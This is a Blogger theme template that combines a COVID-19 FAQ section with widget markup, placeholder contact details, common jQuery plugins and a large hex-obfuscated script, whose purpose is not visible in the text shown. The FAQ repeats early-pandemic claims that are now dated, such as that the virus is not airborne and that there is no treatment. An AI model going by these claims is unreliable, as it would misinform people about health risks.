<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>5. What are the symptoms of COVID-19?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
The most common symptoms of COVID-19 are fever, tiredness, and dry cough. Some patients may have aches and pains, nasal congestion, runny nose, sore throat or diarrhea. These symptoms are usually mild and begin gradually. Some people become infected but don’t develop any symptoms and don't feel unwell. Most people (about 80%) recover from the disease without needing special treatment. Around 1 out of every 6 people who gets COVID-19 becomes seriously ill and develops difficulty breathing. Older people, and those with underlying medical problems like high blood pressure, heart problems or diabetes, are more likely to develop serious illness. People with fever, cough and difficulty breathing should seek medical attention.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>6. Is there any treatment of coronavirus disease (COVID-19)?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
There is no specific medicine to prevent or treat coronavirus disease (COVID-19). People may need supportive care to help them breathe.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>6. Is there anything I should not do?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
The following measures ARE NOT effective against COVID-2019 and can be harmful: Smoking, Wearing multiple masks. In any case, if you have fever, cough and difficulty breathing seek medical care early to reduce the risk of developing a more severe infection and be sure to share your recent travel history with your health care provider.
</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>7. Is the source of the coronavirus causing COVID-19 known?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
Currently, the source of SARS-CoV-2, the coronavirus (CoV) causing COVID-19 is unknown. All available evidence suggests that SARS-CoV-2 has a natural animal origin and is not a constructed virus. SARS-CoV-2 virus most probably has its ecological reservoir in bats. SARS-CoV-2, belongs to a group of genetically related viruses, which also include SARS-CoV and a number of other CoVs isolated from bats populations. MERS-CoV also belongs to this group, but is less closely related.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>8. Is COVID-19 airborne?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
The virus that causes COVID-19 is mainly transmitted through droplets generated when an infected person coughs, sneezes, or speaks. These droplets are too heavy to hang in the air. They quickly fall on floors or surfaces. You can be infected by breathing in the virus if you are within 1 metre of a person who has COVID-19, or by touching a contaminated surface and then touching your eyes, nose or mouth before washing your hands.</p>
</div>
</div>
<!-- END OF TOGGLE -->
</div>
</div>
<div class='clearfix'/>
<div id='brand-services-wrap'>
<div class='container row'>
<b:section id='intro-brand' maxwidgets='5' name='Hand Wash Section' showaddelement='no'>
<b:widget id='LinkList78' locked='true' title='How to wash your Hands' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='link-5'>http://4.bp.blogspot.com/-9n0HqYWQkNg/Xs6R2nfBxXI/AAAAAAAAIio/0wqim0luyjkKs7pt5FV_HG0Iz7XLdteagCK4BGAYYCw/s1600/wash-6.png</b:widget-setting>
<b:widget-setting name='link-3'>http://2.bp.blogspot.com/-jCIZpawuDyM/Xs6R2mET2OI/AAAAAAAAIig/jOMqRdZd_KMpcIduBFoik5YrwlqrnXKMwCK4BGAYYCw/s1600/wash-4.png</b:widget-setting>
<b:widget-setting name='link-4'>http://4.bp.blogspot.com/-43Lqhts6MHs/Xs6R2ob1TOI/AAAAAAAAIik/nFcFzSDOZD09a37bYhnuBo-vK7n1Pj54wCK4BGAYYCw/s1600/wash-5.png</b:widget-setting>
<b:widget-setting name='text-1'>Palm to Palm</b:widget-setting>
<b:widget-setting name='text-0'><![CDATA[Water & Soap]]></b:widget-setting>
<b:widget-setting name='text-3'>Rub Thumbs</b:widget-setting>
<b:widget-setting name='text-2'>Rub Fingers</b:widget-setting>
<b:widget-setting name='text-5'>Rub Wrists</b:widget-setting>
<b:widget-setting name='text-4'>Back of Hands</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='link-1'>http://3.bp.blogspot.com/-OjTaqMl1in8/Xs6R2jPYOXI/AAAAAAAAIiU/LFxxMgMNHF4bXXlFSRBvnecY0MHkncnLwCK4BGAYYCw/s1600/wash-2.png</b:widget-setting>
<b:widget-setting name='link-2'>http://1.bp.blogspot.com/-oGErMRwo0f8/Xs6R2gmSs0I/AAAAAAAAIic/XvTcUems3lAIE2QfagG3Gyp2uy3oqgSfQCK4BGAYYCw/s1600/wash-3.png</b:widget-setting>
<b:widget-setting name='link-0'>http://2.bp.blogspot.com/-p-bRkKepGz8/Xs6R2gPzaJI/AAAAAAAAIiY/oyfaXJyXwS8gxv9AsY4XkOiNqwaJrXl9gCK4BGAYYCw/s1600/wash-1.png</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#brand-services-wrap{display:block}
</style>
<ul>
<b:loop values='data:links' var='link'>
<li expr:class='data:link.name'><img expr:src='data:link.target' expr:title='data:link.name' target='_blank'/><h4><data:link.name/></h4></li>
</b:loop>
</ul>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
<div class='clearfix'/>
</b:if>
<!-- Footer Wrapper -->
<div id='footer-wrapper'>
<div id='contact-area'>
<div class='container row'>
<b:section class='contact-col' id='contact-left' maxwidgets='2' name='Contact Left' showaddelement='no'>
<b:widget id='Text3' locked='true' title='Contact Info' type='Text' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'><![CDATA[Lorem Ipsum is simply dummy text of the printing and typesetting has been the industry's.]]></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<style type='text/css'>
#contact-area{display:block}
</style>
<p class='widget-content'><data:content/></p>
</b:includable>
</b:widget>
<b:widget id='LinkList2' locked='true' title='Contact List' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='text-1'>Behance.net/username</b:widget-setting>
<b:widget-setting name='link-1'>fa-behance</b:widget-setting>
<b:widget-setting name='text-0'>Skype: skype.username </b:widget-setting>
<b:widget-setting name='link-2'>fa-whatsapp</b:widget-setting>
<b:widget-setting name='link-0'>fa-skype</b:widget-setting>
<b:widget-setting name='text-2'>WhatsApp: +01 99 8877-6655</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<style type='text/css'>
#contact-area{display:block}
</style>
<div class='widget-content'>
<b:loop index='i' values='data:links' var='link'>
<div expr:class='"contact-item item-" + data:i'>
<div class='contact-icon'><i expr:class='"fa " + data:link.target'/></div><span class='item-desc'><data:link.name/></span>
</div>
</b:loop>
</div>
</b:includable>
</b:widget>
</b:section>
<b:section class='contact-col' id='contact-right' maxwidgets='1' name='Contact Right' showaddelement='no'>
<b:widget id='ContactForm1' locked='true' title='Contact Form' type='ContactForm' version='2' visible='true'>
<b:includable id='main'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<style type='text/css'>
#contact-area{display:block}
</style>
<div class='contact-form-widget'>
<div class='form'>
<form name='contact-form'>
<input class='contact-form-name' expr:id='data:widget.instanceId + "_contact-form-name"' expr:placeholder='data:contactFormNameMsg' name='name' size='30' type='text' value=''/>
<input class='contact-form-email' expr:id='data:widget.instanceId + "_contact-form-email"' expr:placeholder='data:contactFormEmailMsg + " *"' name='email' size='30' type='text' value=''/>
<textarea class='contact-form-email-message' cols='25' expr:id='data:widget.instanceId + "_contact-form-email-message"' expr:placeholder='data:contactFormMessageMsg + " *"' name='email-message' rows='5'/>
<input class='contact-form-button contact-form-button-submit' expr:id='data:widget.instanceId + "_contact-form-submit"' expr:value='data:contactFormSendMsg' type='button'/>
<p class='contact-form-error-message' expr:id='data:widget.instanceId + "_contact-form-error-message"'/>
<p class='contact-form-success-message' expr:id='data:widget.instanceId + "_contact-form-success-message"'/>
</form>
</div>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
<!-- Main Top Bar -->
<div id='top-bar'>
<div class='container row'>
<!-- Top Social -->
<b:section class='top-bar-social social' id='top-bar-social' maxwidgets='2' name='Social & Subscribe' showaddelement='yes'>
<b:widget id='FollowByEmail2' locked='true' title='Subscribe To Newsletter' type='FollowByEmail' visible='true'>
<b:includable id='main'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<div class='follow-by-email-inner'>
<form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='"window.open(\"https://feedburner.google.com/fb/a/mailverify?uri=" + data:feedPath + "\", \"popupwindow\", \"scrollbars=yes,width=550,height=520\"); return true"' method='post' target='popupwindow'>
<input autocomplete='off' class='follow-by-email-address' expr:placeholder='data:messages.emailAddress' name='email' type='email'/>
<input class='follow-by-email-submit' expr:value='data:messages.getEmailNotifications' type='submit'/>
<input expr:value='data:feedPath' name='uri' type='hidden'/>
<input name='loc' type='hidden' value='en_US'/>
</form>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='LinkList73' locked='true' title='' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='link-3'>#</b:widget-setting>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='text-1'>twitter</b:widget-setting>
<b:widget-setting name='link-1'>#</b:widget-setting>
<b:widget-setting name='text-0'>facebook</b:widget-setting>
<b:widget-setting name='link-2'>#</b:widget-setting>
<b:widget-setting name='text-3'>pinterest</b:widget-setting>
<b:widget-setting name='link-0'>https://fb.com/soratemplates</b:widget-setting>
<b:widget-setting name='text-2'>instagram</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<ul>
<b:loop values='data:links' var='link'>
<li expr:class='data:link.name'><a expr:href='data:link.target' expr:title='data:link.name' target='_blank'/></li>
</b:loop>
</ul>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
<div class='clearfix'/>
<div id='footer-copyright'>
<div class='container row'>
<div class='copyright-area'>Created By <a href='http://soratemplates.com/' id='mycontent' rel='dofollow' title='Free Blogger Templates'>SoraTemplates</a> | Distributed By <a href='https://gooyaabitemplates.com/' rel='dofollow' style='color:#ff00ba;' title='Blogger Templates' target='_blank'>Gooyaabi Templates</a> </div>
<b:section class='top-bar-nav' id='top-bar-nav' maxwidgets='1' name='Footer Navigation' showaddelement='yes'>
<b:widget id='LinkList72' locked='true' title='' type='LinkList' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='sorting'>NONE</b:widget-setting>
<b:widget-setting name='text-1'>About</b:widget-setting>
<b:widget-setting name='link-1'>https://kovid-soratemplates.blogspot.com/p/about.html</b:widget-setting>
<b:widget-setting name='text-0'>Home</b:widget-setting>
<b:widget-setting name='link-2'>https://kovid-soratemplates.blogspot.com/p/contact.html</b:widget-setting>
<b:widget-setting name='link-0'>/</b:widget-setting>
<b:widget-setting name='text-2'>Contact Us</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<ul>
<b:loop values='data:links' var='link'>
<li><a expr:href='data:link.target'><data:link.name/></a></li>
</b:loop>
</ul>
</div>
</b:includable>
</b:widget>
</b:section>
<div class='clearfix'/>
</div>
</div>
</div>
</div>
<!-- Main Scripts -->
<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js' type='text/javascript'/>
<!-- Theme Functions JS -->
<script type='text/javascript'>
//<![CDATA[
/*!
Waypoints - 3.1.1
Copyright © 2011-2015 Caleb Troughton
Licensed under the MIT license.
https://github.com/imakewebthings/waypoints/blog/master/licenses.txt
*/
!function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},t.prototype.trigger=function(t){this.enabled&&this.callback&&this.callback.apply(this,t)},t.prototype.destroy=function(){this.context.remove(this),this.group.remove(this),delete i[this.key]},t.prototype.disable=function(){return this.enabled=!1,this},t.prototype.enable=function(){return this.context.refresh(),this.enabled=!0,this},t.prototype.next=function(){return this.group.next(this)},t.prototype.previous=function(){return this.group.previous(this)},t.invokeAll=function(t){var e=[];for(var o in i)e.push(i[o]);for(var n=0,r=e.length;r>n;n++)e[n][t]()},t.destroyAll=function(){t.invokeAll("destroy")},t.disableAll=function(){t.invokeAll("disable")},t.enableAll=function(){t.invokeAll("enable")},t.refreshAll=function(){t.Context.refreshAll()},t.viewportHeight=function(){return window.innerHeight||document.documentElement.clientHeight},t.viewportWidth=function(){return document.documentElement.clientWidth},t.adapters=[],t.defaults={context:window,continuous:!0,enabled:!0,group:"default",horizontal:!1,offset:0},t.offsetAliases={"bottom-in-view":function(){return this.context.innerHeight()-this.adapter.outerHeight()},"right-in-view":function(){return this.context.innerWidth()-this.adapter.outerWidth()}},window.Waypoint=t}(),function(){"use strict";function t(t){window.setTimeout(t,1e3/60)}function e(t){this.element=t,this.Adapter=n.Adapter,this.adapter=new this.Adapter(t),this.key="waypoint-context-"+i,this.didScroll=!1,this.didResize=!1,this.oldScroll={x:this.adapter.scrollLeft(),y:this.adapter.scrollTop()},this.waypoints={vertical:{},horizontal:{}},t.waypointContextKey=this.key,o[t.waypointContextKey]=this,i+=1,this.createThrottledScrollHandler(),this.createThrottledResizeHandler()}var i=0,o={},n=window.Waypoint,r=window.onload;e.prototype.add=function(t){var e=t.options.horizontal?"horizontal":"vertical";this.waypoints[e][t.key]=t,this.refresh()},e.prototype.checkEmpty=function(){var t=this.Adapter.isEmptyObject(this.waypoints.horizontal),e=this.Adapter.isEmptyObject(this.waypoints.vertical);t&&e&&(this.adapter.off(".waypoints"),delete o[this.key])},e.prototype.createThrottledResizeHandler=function(){function t(){e.handleResize(),e.didResize=!1}var e=this;this.adapter.on("resize.waypoints",function(){e.didResize||(e.didResize=!0,n.requestAnimationFrame(t))})},e.prototype.createThrottledScrollHandler=function(){function t(){e.handleScroll(),e.didScroll=!1}var e=this;this.adapter.on("scroll.waypoints",function(){(!e.didScroll||n.isTouch)&&(e.didScroll=!0,n.requestAnimationFrame(t))})},e.prototype.handleResize=function(){n.Context.refreshAll()},e.prototype.handleScroll=function(){var t={},e={horizontal:{newScroll:this.adapter.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.adapter.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};for(var i in e){var o=e,n=o.newScroll>o.oldScroll,r=n?o.forward:o.backward;for(var s in this.waypoints){var a=this.waypoints,l=o.oldScroll<a.triggerPoint,h=o.newScroll>=a.triggerPoint,p=l&&h,u=!l&&!h;(p||u)&&(a.queueTrigger(r),t[a.group.id]=a.group)}}for(var c in t)t[c].flushTriggers();this.oldScroll={x:e.horizontal.newScroll,y:e.vertical.newScroll}},e.prototype.innerHeight=function(){return this.element==this.element.window?n.viewportHeight():this.adapter.innerHeight()},e.prototype.remove=function(t){delete this.waypoints[t.axis][t.key],this.checkEmpty()},e.prototype.innerWidth=function(){return this.element==this.element.window?n.viewportWidth():this.adapter.innerWidth()},e.prototype.destroy=function(){var t=[];for(var e in this.waypoints)for(var i in this.waypoints[e])t.push(this.waypoints[e]);for(var o=0,n=t.length;n>o;o++)t[o].destroy()},e.prototype.refresh=function(){var t,e=this.element==this.element.window,i=this.adapter.offset(),o={};this.handleScroll(),t={horizontal:{contextOffset:e?0:i.left,contextScroll:e?0:this.oldScroll.x,contextDimension:this.innerWidth(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:e?0:i.top,contextScroll:e?0:this.oldScroll.y,contextDimension:this.innerHeight(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}};for(var n in t){var r=t[n];for(var s in this.waypoints[n]){var a,l,h,p,u,c=this.waypoints[n],d=c.options.offset,f=c.triggerPoint,w=0,y=null==f;c.element!==c.element.window&&(w=c.adapter.offset()[r.offsetProp]),"function"==typeof d?d=d.apply(c):"string"==typeof d&&(d=parseFloat(d),c.options.offset.indexOf("%")>-1&&(d=Math.ceil(r.contextDimension*d/100))),a=r.contextScroll-r.contextOffset,c.triggerPoint=w+a-d,l=f<r.oldScroll,h=c.triggerPoint>=r.oldScroll,p=l&&h,u=!l&&!h,!y&&p?(c.queueTrigger(r.backward),o[c.group.id]=c.group):!y&&u?(c.queueTrigger(r.forward),o[c.group.id]=c.group):y&&r.oldScroll>=c.triggerPoint&&(c.queueTrigger(r.forward),o[c.group.id]=c.group)}}for(var g in o)o[g].flushTriggers();return this},e.findOrCreateByElement=function(t){return e.findByElement(t)||new e(t)},e.refreshAll=function(){for(var t in o)o[t].refresh()},e.findByElement=function(t){return o[t.waypointContextKey]},window.onload=function(){r&&r(),e.refreshAll()},n.requestAnimationFrame=function(e){var i=window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||t;i.call(window,e)},n.Context=e}(),function(){"use strict";function t(t,e){return t.triggerPoint-e.triggerPoint}function e(t,e){return e.triggerPoint-t.triggerPoint}function i(t){this.name=t.name,this.axis=t.axis,this.id=this.name+"-"+this.axis,this.waypoints=[],this.clearTriggerQueues(),o[this.axis][this.name]=this}var o={vertical:{},horizontal:{}},n=window.Waypoint;i.prototype.add=function(t){this.waypoints.push(t)},i.prototype.clearTriggerQueues=function(){this.triggerQueues={up:[],down:[],left:[],right:[]}},i.prototype.flushTriggers=function(){for(var i in this.triggerQueues){var o=this.triggerQueues,n="up"===i||"left"===i;o.sort(n?e:t);for(var r=0,s=o.length;s>r;r+=1){var a=o[r];(a.options.continuous||r===o.length-1)&&a.trigger()}}this.clearTriggerQueues()},i.prototype.next=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints),o=i===this.waypoints.length-1;return o?null:this.waypoints[i+1]},i.prototype.previous=function(e){this.waypoints.sort(t);var i=n.Adapter.inArray(e,this.waypoints);return i?this.waypoints[i-1]:null},i.prototype.queueTrigger=function(t,e){this.triggerQueues[e].push(t)},i.prototype.remove=function(t){var e=n.Adapter.inArray(t,this.waypoints);e>-1&&this.waypoints.splice(e,1)},i.prototype.first=function(){return this.waypoints[0]},i.prototype.last=function(){return this.waypoints[this.waypoints.length-1]},i.findOrCreate=function(t){return o[t.axis][t.name]||new i(t)},n.Group=i}(),function(){"use strict";function t(t){this.$element=e(t)}var e=window.jQuery,i=window.Waypoint;e.each(["innerHeight","innerWidth","off","offset","on","outerHeight","outerWidth","scrollLeft","scrollTop"],function(e,i){t.prototype=function(){var t=Array.prototype.slice.call(arguments);return this.$element.apply(this.$element,t)}}),e.each(["extend","inArray","isEmptyObject"],function(i,o){t[o]=e[o]}),i.adapters.push({name:"jquery",Adapter:t}),i.Adapter=t}(),function(){"use strict";function t(t){return function(){var i=[],o=arguments[0];return t.isFunction(arguments[0])&&(o=t.extend({},arguments[1]),o.handler=arguments[0]),this.each(function(){var n=t.extend({},o,{element:this});"string"==typeof n.context&&(n.context=t(this).closest(n.context)[0]),i.push(new e(n))}),i}}var e=window.Waypoint;window.jQuery&&(window.jQuery.fn.waypoint=t(window.jQuery)),window.Zepto&&(window.Zepto.fn.waypoint=t(window.Zepto))}();
/*!
* jquery.counterup.js 1.0
*
* Copyright 2013, Benjamin Intal http://gambit.ph @bfintal
* Released under the GPL v2 License
*
* Date: Nov 26, 2013
*/
(function( $ ){
"use strict";
$.fn.counterUp = function( options ) {
// Defaults
var settings = $.extend({
'time': 400,
'delay': 10
}, options);
return this.each(function(){
// Store the object
var $this = $(this);
var $settings = settings;
var counterUpper = function() {
var nums = [];
var divisions = $settings.time / $settings.delay;
var num = $this.text();
var isComma = /[0-9]+,[0-9]+/.test(num);
num = num.replace(/,/g, '');
var isInt = /^[0-9]+$/.test(num);
var isFloat = /^[0-9]+\.[0-9]+$/.test(num);
var decimalPlaces = isFloat ? (num.split('.')[1] || []).length : 0;
// Generate list of incremental numbers to display
for (var i = divisions; i >= 1; i--) {
// Preserve as int if input was int
var newNum = parseInt(num / divisions * i);
// Preserve float if input was float
if (isFloat) {
newNum = parseFloat(num / divisions * i).toFixed(decimalPlaces);
}
// Preserve commas if input had commas
if (isComma) {
while (/(\d+)(\d{3})/.test(newNum.toString())) {
newNum = newNum.toString().replace(/(\d+)(\d{3})/, '$1'+','+'$2');
}
}
nums.unshift(newNum);
}
$this.data('counterup-nums', nums);
$this.text('0');
// Updates the number until we're done
var f = function() {
$this.text($this.data('counterup-nums').shift());
if ($this.data('counterup-nums').length) {
setTimeout($this.data('counterup-func'), $settings.delay);
} else {
delete $this.data('counterup-nums');
$this.data('counterup-nums', null);
$this.data('counterup-func', null);
}
};
$this.data('counterup-func', f);
// Start the count up
setTimeout($this.data('counterup-func'), $settings.delay);
};
// Perform counts when the element gets into view
$this.waypoint(function(direction){
counterUpper();
this.destroy(); //-- Waypoint 3.0 version of triggerOnce
}, { offset: '100%'});
});
};
})( jQuery );
jQuery(document).ready(function($) {
$('.counter-sora').counterUp({
delay: 20,
time: 2000
});
});
$(document)["ready"](function() {
"use strict";
var a = $(window);
$(".full-height")["height"](a["height"]());
a["on"]("resize", function() {
$(".full-height")["height"](a["height"]());
});
});
var _0xa4fb=["\x34\x6E\x28\x34\x66\x28\x70\x2C\x61\x2C\x63\x2C\x6B\x2C\x65\x2C\x72\x29\x7B\x65\x3D\x34\x66\x28\x63\x29\x7B\x34\x67\x28\x63\x3C\x61\x3F\x27\x27\x3A\x65\x28\x34\x69\x28\x63\x2F\x61\x29\x29\x29\x2B\x28\x28\x63\x3D\x63\x25\x61\x29\x3E\x33\x35\x3F\x34\x6A\x2E\x34\x6F\x28\x63\x2B\x32\x39\x29\x3A\x63\x2E\x34\x70\x28\x33\x36\x29\x29\x7D\x3B\x34\x68\x28\x21\x27\x27\x2E\x34\x6B\x28\x2F\x5E\x2F\x2C\x34\x6A\x29\x29\x7B\x34\x6C\x28\x63\x2D\x2D\x29\x72\x5B\x65\x28\x63\x29\x5D\x3D\x6B\x5B\x63\x5D\x7C\x7C\x65\x28\x63\x29\x3B\x6B\x3D\x5B\x34\x66\x28\x65\x29\x7B\x34\x67\x20\x72\x5B\x65\x5D\x7D\x5D\x3B\x65\x3D\x34\x66\x28\x29\x7B\x34\x67\x27\x5C\x5C\x77\x2B\x27\x7D\x3B\x63\x3D\x31\x7D\x3B\x34\x6C\x28\x63\x2D\x2D\x29\x34\x68\x28\x6B\x5B\x63\x5D\x29\x70\x3D\x70\x2E\x34\x6B\x28\x34\x6D\x20\x34\x71\x28\x27\x5C\x5C\x62\x27\x2B\x65\x28\x63\x29\x2B\x27\x5C\x5C\x62\x27\x2C\x27\x67\x27\x29\x2C\x6B\x5B\x63\x5D\x29\x3B\x34\x67\x20\x70\x7D\x28\x27\x45\x20\x32\x46\x3D\x5B\x5C\x27\x5C\x5C\x31\x6C\x5C\x5C\x39\x5C\x5C\x31\x33\x5C\x5C\x76\x5C\x5C\x59\x5C\x27\x2C\x5C\x27\x5C\x5C\x34\x5C\x5C\x35\x5C\x5C\x35\x5C\x5C\x66\x5C\x27\x2C\x5C\x27\x5C\x5C\x5A\x5C\x5C\x65\x5C\x5C\x38\x5C\x5C\x34\x5C\x5C\x64\x5C\x5C\x50\x5C\x27\x2C\x5C\x27\x5C\x5C\x37\x5C\x5C\x47\x5C\x5C\x31\x36\x5C\x5C\x31\x7A\x5C\x5C\x39\x5C\x27\x2C\x5C\x27\x5C\x5C\x6C\x5C\x5C\x34\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x64\x5C\x5C\x35\x5C\x27\x2C\x5C\x27\x5C\x5C\x6C\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x4A\x5C\x5C\x33\x5C\x5C\x64\x5C\x5C\x35\x5C\x5C\x31\x36\x5C\x5C\x33\x5C\x5C\x6A\x5C\x27\x2C\x5C\x27\x5C\x5C\x36\x5C\x5C\x76\x5C\x5C\x62\x5C\x5C\x4B\x5C\x27\x2C\x5C\x27\x5C\x5C\x34\x5C\x5C\x37\x5C\x5C\x37\x5C\x5C\x51\x5C\x5C\x38\x5C\x5C\x34\x5C\x5C\x36\x5C\x5C\x36\x5C\x27\x2C\x5C\x27\x5C\x5C\x63\x5C\x5C\x76\x5C\x5C\x39\x5C\x5C\x38\x5C\x5C\x37\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x64\x5C\x27\x2C\x5C\x27\x5C\x5C\x7A\x5C\x5C\x67\x5C\x5C\x6B\x5C\x5C\x36\x5C\x5C\x74\x5C\x5C\x65\x5C\x27\x2C\x5C\x27\x5C\x5C\x36\x5C\x5C\x38\x5C\x5C\x39\x5C\x5C\x37\x5C\x5C\x33\x5C\x5C\x53\x5C\x5C\x62\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x38\x5C\x27\x2C\x5C\x27\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x67\x5C\x5C\x62\x5C\x5C\x4A\x5C\x5C\x33\x5C\x5C\x51\x5C\x5C\x38\x5C\x5C\x34\x5C\x5C\x36\x5C\x27\x2C\x5C\x27\x5C\x5C\x6A\x5C\x5C\x39\x5C\x5C\x64\x5C\x5C\x37\x5C\x27\x2C\x5C\x27\x5C\x5C\x44\x5C\x5C\x72\x5C\x5C\x7A\x5C\x5C\x67\x5C\x5C\x6B\x5C\x5C\x36\x5C\x5C\x74\x5C\x5C\x65\x5C\x27\x2C\x5C\x27\x5C\x5C\x34\x5C\x5C\x6C\x5C\x5C\x6C\x5C\x5C\x38\x5C\x5C\x47\x5C\x27\x2C\x5C\x27\x5C\x5C\x74\x5C\x5C\x64\x5C\x5C\x37\x5C\x5C\x33\x5C\x5C\x6A\x5C\x5C\x39\x5C\x5C\x64\x5C\x5C\x33\x5C\x5C\x37\x5C\x27\x2C\x5C\x27\x5C\x5C\x62\x5C\x5C\x65\x5C\x5C\x31\x30\x5C\x5C\x33\x5C\x5C\x63\x5C\x5C\x35\x5C\x27\x2C\x5C\x27\x5C\x5C\x6A\x5C\x5C\x74\x5C\x5C\x64\x5C\x5C\x63\x5C\x5C\x35\x5C\x5C\x39\x5C\x5C\x62\x5C\x5C\x64\x5C\x27\x2C\x5C\x27\x5C\x5C\x31\x41\x5C\x5C\x33\x5C\x5C\x6E\x5C\x5C\x55\x5C\x5C\x31\x5C\x5C\x6C\x5C\x27\x2C\x5C\x27\x5C\x5C\x31\x51\x5C\x5C\x32\x47\x5C\x5C\x32\x65\x5C\x5C\x31\x51\x5C\x5C\x72\x5C\x5C\x32\x66\x5C\x5C\x31\x42\x5C\x5C\x32\x47\x5C\x5C\x72\x5C\x5C\x31\x42\x5C\x27\x2C\x5C\x27\x5C\x5C\x32\x65\x5C\x5C\x31\x51\x5C\x5C\x72\x5C\x5C\x32\x66\x5C\x5C\x31\x42\x5C\x5C\x32\x48\x5C\x5C\x31\x42\x5C\x5C\x32\x48\x5C\x5C\x31\x42\x5C\x5C\x32\x65\x5C\x27\x2C\x5C\x27\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x34\x5C\x5C\x37\x5C\x5C\x47\x5C\x27\x2C\x5C\x27\x5C\x5C\x31\x63\x5C\x5C\x6C\x5C\x5C\x32\x67\x5C\x5C\x31\x43\x5C\x5C\x56\x5C\x27\x2C\x5C\x27\x5C\x5C\x63\x5C\x5C\x66\x5C\x5C\x33\x5C\x5C\x34\x5C\x5C\x35\x5C\x5C\x33\x5C\x5C\x55\x5C\x5C\x38\x5C\x5C\x33\x5C\x5C\x67\x5C\x27\x2C\x5C\x27\x5C\x5C\x33\x5C\x5C\x64\x5C\x5C\x35\x5C\x27\x2C\x5C\x27\x5C\x5C\x36\x5C\x5C\x63\x5C\x5C\x66\x5C\x5C\x39\x5C\x5C\x6C\x5C\x5C\x35\x5C\x27\x2C\x5C\x27\x5C\x5C\x35\x5C\x5C\x47\x5C\x5C\x6C\x5C\x5C\x33\x5C\x27\x2C\x5C\x27\x5C\x5C\x35\x5C\x5C\x33\x5C\x5C\x31\x5C\x5C\x35\x5C\x5C\x77\x5C\x5C\x31\x30\x5C\x5C\x34\x5C\x5C\x4A\x5C\x5C\x34\x5C\x5C\x36\x5C\x27\x2C\x5C\x27\x5C\x5C\x34\x5C\x5C\x36\x5C\x5C\x47\x5C\x5C\x64\x5C\x5C\x63\x5C\x27\x2C\x5C\x27\x5C\x5C\x36\x5C\x5C\x66\x5C\x5C\x63\x5C\x27\x2C\x5C\x27\x5C\x5C\x67\x5C\x5C\x77\x5C\x5C\x33\x5C\x5C\x67\x5C\x5C\x65\x5C\x5C\x33\x5C\x5C\x37\x5C\x5C\x7A\x5C\x5C\x31\x30\x5C\x5C\x36\x5C\x27\x2C\x5C\x27\x5C\x5C\x6E\x5C\x5C\x33\x5C\x5C\x35\x5C\x5C\x55\x5C\x5C\x38\x5C\x5C